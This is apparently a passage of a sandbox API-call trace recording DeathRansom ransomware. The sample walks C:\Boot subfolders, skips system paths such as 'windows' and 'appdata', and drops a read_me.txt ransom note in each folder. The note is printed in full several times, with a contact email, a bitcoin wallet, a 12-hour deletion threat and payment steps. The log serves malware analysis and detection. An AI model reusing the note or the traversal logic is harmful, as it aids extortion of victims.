lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.979] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0074.979] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0074.979] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0074.979] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0074.979] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.979] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\read_me.txt") returned 29 [0074.979] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\read_me.txt" (normalized: "c:\\boot\\en-us\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.979] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.979] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.980] CloseHandle (hObject=0x7a8) returned 1 [0074.980] GetProcessHeap () returned 0x4f10000 [0074.981] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0074.981] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0074.981] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0074.981] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0074.981] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0074.981] StrStrW (lpFirst="es-es", lpSrch="programdata") returned 0x0 [0074.981] StrStrW (lpFirst="es-es", lpSrch="$recycle.bin") returned 0x0 [0074.981] StrStrW (lpFirst="es-es", lpSrch="program files") returned 0x0 [0074.981] StrStrW (lpFirst="es-es", lpSrch="windows") returned 0x0 [0074.981] StrStrW (lpFirst="es-es", lpSrch="all users") returned 0x0 [0074.981] StrStrW (lpFirst="es-es", lpSrch="appdata") returned 0x0 [0074.981] GetProcessHeap () returned 0x4f10000 [0074.981] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0074.981] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\es-ES" | out: lpString1="\\\\?\\C:\\Boot\\es-ES") returned="\\\\?\\C:\\Boot\\es-ES" [0074.981] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 7 [0074.981] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0074.981] GetProcessHeap () returned 0x4f10000 [0074.981] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8af0080 [0074.982] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0074.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.993] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0074.993] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0074.993] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.993] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0074.993] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0074.993] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.994] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.994] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0074.994] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0074.994] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.994] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\read_me.txt") returned 29 [0074.994] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\read_me.txt" (normalized: "c:\\boot\\es-es\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0074.994] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.994] WriteFile (in: hFile=0x7b0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.995] CloseHandle (hObject=0x7b0) returned 1 [0074.995] GetProcessHeap () returned 0x4f10000 [0074.995] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8af0080 | out: hHeap=0x4f10000) returned 1 [0074.996] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0074.996] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0074.996] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0074.996] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0074.996] StrStrW (lpFirst="fi-fi", lpSrch="programdata") returned 0x0 [0074.996] StrStrW (lpFirst="fi-fi", lpSrch="$recycle.bin") returned 0x0 [0074.996] StrStrW (lpFirst="fi-fi", lpSrch="program files") returned 0x0 [0074.996] StrStrW (lpFirst="fi-fi", lpSrch="windows") returned 0x0 [0074.996] StrStrW (lpFirst="fi-fi", lpSrch="all users") returned 0x0 [0074.996] StrStrW (lpFirst="fi-fi", lpSrch="appdata") returned 0x0 [0074.996] GetProcessHeap () returned 0x4f10000 [0074.996] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0074.997] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\fi-FI" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI") returned="\\\\?\\C:\\Boot\\fi-FI" [0074.997] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 8 [0074.997] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0074.999] GetProcessHeap () returned 0x4f10000 [0074.999] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0074.999] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0074.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.999] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0074.999] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0074.999] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.999] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0074.999] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0074.999] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.999] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.999] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0074.999] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.000] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.000] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\read_me.txt") returned 29 [0075.000] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\read_me.txt" (normalized: "c:\\boot\\fi-fi\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0075.000] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.000] WriteFile (in: hFile=0x7b0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.001] CloseHandle (hObject=0x7b0) returned 1 [0075.001] GetProcessHeap () returned 0x4f10000 [0075.001] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.001] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0075.001] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0075.001] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0075.001] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0075.001] StrStrW (lpFirst="fonts", lpSrch="programdata") returned 0x0 [0075.001] StrStrW (lpFirst="fonts", lpSrch="$recycle.bin") returned 0x0 [0075.001] StrStrW (lpFirst="fonts", lpSrch="program files") returned 0x0 [0075.001] StrStrW (lpFirst="fonts", lpSrch="windows") returned 0x0 [0075.001] StrStrW (lpFirst="fonts", lpSrch="all users") returned 0x0 [0075.001] StrStrW (lpFirst="fonts", lpSrch="appdata") returned 0x0 [0075.001] GetProcessHeap () returned 0x4f10000 [0075.001] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.001] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\Fonts" | out: lpString1="\\\\?\\C:\\Boot\\Fonts") returned="\\\\?\\C:\\Boot\\Fonts" [0075.001] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 9 [0075.001] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.002] GetProcessHeap () returned 0x4f10000 [0075.002] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0075.004] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0075.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.004] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0075.004] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.004] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.004] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0075.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.005] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0075.005] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0075.005] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, 